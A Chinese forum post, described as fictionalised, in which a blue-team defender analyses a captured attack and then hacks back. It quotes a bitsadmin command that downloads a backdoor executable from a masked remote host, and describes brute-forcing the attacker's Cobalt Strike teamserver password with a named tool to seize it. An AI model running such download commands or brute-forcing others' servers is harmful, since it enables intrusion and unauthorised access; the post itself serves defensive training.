• 注册
  • 威胁情报 威胁情报 关注:45 内容:46

    HW蓝队:实战溯源反制红队!!!

  • 查看作者
  • 打赏作者
    • 威胁情报
    • 为了配合文章发挥,故事情节纯属虚构,请遵守网络安全法,做一名合格Hacker。


      故事的起源 | 开头


      是Wineme,一名默默无闻的屌丝,之前在B站讲过几次课,相信圈子里有极少部分的人认识我,或者......不认识我,今年的HW比以往来的要快一些,这让我这名屌丝有些受不了“金钱”的诱惑,于是,我就抵达了首都,参加这次HW行动中的.......蓝队。

      交接完成后,我和同事一起开始倒班工作,白天黑夜做着一份非常高级的并且普通人不能完成的工作,这份工作必须集中十分的注意力才能完成,而且你需要有高超的技术,普通人琢磨不透的方法,那么就是“攻击研判”(看WAF)。

      虽然普通人感觉十分无聊的工作,但是对于我来说确实充满着刺激,并且我坚信,会有人搞我们。

      由于第一天是我值夜班,在这深夜里,由我一个人看着这硕大的屏幕,外面刮着风,下着雨,环境变得十分安静,我静静地坐着,慢慢的时间过去,看着这一条条的攻击数据,全是低危,一看便是某黑客组织在批量扫描的IP段,这些我没放在心上。

      慢慢的凌晨两点了,很快,出现拦截了一条高危,打开流量审查的那一刻,我可以确信.............这是一个RCE的漏洞。

      HW蓝队:实战溯源反制红队!!!

      Exp分析


      0x01 于是我认真,仔细的分析了这条EXP,这应该通过这个网站去下载一个exe的文件,那么这个exe的文件应该是一个后门木马,我们可以进行

      溯源一下IP。

      bitsadmin /transfer n "http://wwww.******.tk/rh.exe" d:\\rh.exe

      HW蓝队:实战溯源反制红队!!!

      0x02 之后我将文件拖入ida里面进行分析,发现???这是什么鬼,于是经过我之前的直觉判断,这绝对是一个C#程序,其中有VirtualAlloc也就是申请内存的函数操作,说明是存在一个shellcode来进行加载内存上线的。

      HW蓝队:实战溯源反制红队!!!

      0x03 于是我打开反编译C#程序的Reflector,来进行打开程序,一看便知,果然如此。

      HW蓝队:实战溯源反制红队!!!

      0x04 打开Main函数,发现shellcode,我们可以将shellcode转换成汇编来进行寻找shellcode里面的IP。

      HW蓝队:实战溯源反制红队!!!

      0x05 我们可以使用windbg来进行。

      .dvalloc 1000  //分配内存

      eb 地址 分配shellcode

      u 地址 //查看汇编

      但是windbg好像无复制这么长的shellcode。

      0x06 于是乎,我使用最笨的方法,直接使用C语言生成exe,然后丢进ida里面转换字符串,直接get IP。

      HW蓝队:实战溯源反制红队!!!

      0x07 之后使用IDA,直接获取了红队的IP。

      HW蓝队:实战溯源反制红队!!!

      开始制裁 | 反制

      获取到IP之后我扫描收集了一下,发现该IP只开放了50050端口,而50050端口却是cobalt strike的默认端口。

      HW蓝队:实战溯源反制红队!!!

      于是我使用 CS 爆破工具 https://github.com/ryanohoro/csbruter

      成功破解出来密码为:admin666

      HW蓝队:实战溯源反制红队!!!

      之后成功拿下cobalt strike的权限,还有服务器的。

      HW蓝队:实战溯源反制红队!!!

      蓝队总结

      Wineme says:

      其实在真实HW中,蓝队所掌握的不仅仅是看WAF,而且也要掌握一个好的逆向本领还有一个日志取证,可以清晰的辨别红队IP,该红队反制故事虽然简单,但是在实战中,要想反制红队并没有这么简单,要想真正的反制红队,这需要大家的技术从下而上的提高,而不是传统的“拔网线,看WAF”的方式。

      本帖转自安全Play公众号,如有侵权请私聊删文

      请登录之后再进行评论

      登录
    • 发表内容
    • 做任务
    • 实时动态
    • 偏好设置
    • 帖子间隔 侧栏位置: